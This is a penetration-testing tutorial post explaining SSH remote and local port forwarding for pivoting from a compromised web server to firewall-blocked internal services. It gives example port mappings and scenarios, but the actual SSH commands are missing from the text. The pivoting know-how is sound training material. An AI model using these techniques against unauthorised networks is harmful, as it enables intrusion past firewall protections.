Remote & Local Port Tunneling
SSH Port Forwarding, Network Pentesting, Pivoting
A year ago, I worked on one of the eLearning Security labs while taking the PTP course. During one of the labs, I compromised an external web server where I found MySQL and RDP’s internal services running on the localhost.
The firewall set up on that network blocks any inbound traffic to these services. To interact with them, I needed to tunnel the traffic from the internal compromised machine to mine and bypass the firewall restriction — that technique is called Port forwarding or tunneling.
Today, we are going to talk about local and remote port tunneling with the SSH protocol.
📝$_Key_Concepts:
- Port Tunneling Overview
- Remote Port Forwarding
- Local Port Forwarding
- Resources
$_Port_Tunneling
Port tunneling or forwarding is a networking technique that allows traffic between local and remote machines. We use port tunneling when we either can’t reach a destination because it is protected behind a firewall or only accessible internally.
$_Remote_Forwarding
Remote port forwarding is relaying traffic from internal running services to be accessible externally for a specific machine.
Scenario: let’s say you have compromised a web server through a SQL injection vulnerability and got a reverse shell; during the post-exploitation enumeration, you found internal running services VNC (5900), NodeJS (3000), MySQL (3306), and SSH (22). With enumeration, you also discovered that the firewall does not allow inbound traffic for these services, so you can’t connect to them directly.
However, this restriction does not apply to outbound traffic.
⛔️Issue
- We (at the Pentester machine) can’t interact directly with the internal running services on the compromised web server.
🔥Firewall Rules
- Inbound traffic is allowed only on ports 80 and 443
- Outbound traffic is allowed for 80,443 and 22
🎯Goal:
- Interact with local hosted services for further enumeration.
❓ How would we interact with these internal services?
💡Solution
We can use the remote port forwarding technique to expose the internal services and interact with them from our (Attacker/Pentester)machine.
Using SSH tunneling, we will open 3 local ports on the Pentester machine(172.15.40.5) on ports 2222, 5050, and 9003 to map them to the local services on the compromised web server — NodeJS, MySQL, and VNC.
Once the ports are mapped correctly, we will able to SSH from the compromised machine to our pentesting VPS machine and forward the traffic through the tunnel.
All incoming traffic from the Pentester machine on ports 2222, 5050, and 9003 will be forwarded to the compromised machine mapped services, allowing us to reach these services even though it is filtered at the firewall.
127.0.0.1:3000 [NodeJS] => 172.15.40.5:2222
127.0.0.1:3306 [MySQL] =>172.15.40.51:5050
127.0.0.1:5900 [VNC] => 172.15.40.5:9003
📌Remember:
- With remote port forwarding, the Pentester/Attacker machine is the one listening locally for traffic from the compromised server.
- The Firewall allows for outbound SSH traffic.
- SSH is enabled on the compromised machine in order to login to the Pentester machine from the web server.
On the compromised run, these SSH commands:
$_Local_Forwarding
Local Port Forwarding is making a REMOTE service available on our local machine, in our case, the Pentester machine. Let’s take another scenario to understand this better.
Scenario:
We compromised a web server and got a reverse shell on the server; during the enumeration process, we discovered that in addition to being connected to the current network (10.10.10.x), it has another network interface that seems to be connected to a different network (192.168.10.x).
In the internal network, we were able to identify 3 services — FTP, SMB, and MySQL running on different servers. We also found that we can’t connect to these services directly; the firewall restricts that. It is set up for the webserver ONLY to interact with them.
⛔️Issue
- We (the Pentester) can’t interact with internal running services - FTP, SMB, and MySQL on the internal network — 192.168.10.x
🔥Firewall Rules
- Inbound and outbound traffic is allowed on ports 80,443 and 22.
🎯Goal:
- We want to interact with internal services on the internal network from our Pentester machine.
❓ How would we interact with these internal services?
💡Solution
We need to pivot through the compromised web server and forward the traffic to and from the internal network with SSH tunneling. This time, we will use the Local Port Forwarding technique to map internal services ports to the compromised machine’s local ports.
127.0.0.1:5050= 21 [FTP]
127.0.0.1:4455 => 445 [SMB]
127.0.0.1:9003 =>3306 [MySQL]
This way, every time we send SMB, MySQL, or FTP traffic from our Pentester machine to the compromised web server, the server will be forward that traffic to the internal network through the locally mapped ports 5050,4455 or 9003.
This way we reach to the internal services and enumerate them further.
📌Remember:
- With local port forwarding, the compromised machine is the listening machine. It listens locally for traffic from the Pentester machine and forwards it internally to the FTP, MySQL, and SMB servers on the internal network
- The firewall allows for outbound SSH traffic.
- SSH is enabled on the compromised machine.
- The Pentester has to obtain the SSH credentials of the compromised server first before logging into it from the Pentester machine.
On the Pentester machine, run these SSH commands:
That’s how we use SSH tunneling into forwarding traffic to unreachable networks or internally hosted services during pentestng engagements.
That’s all for today. Thanks for reading !!!
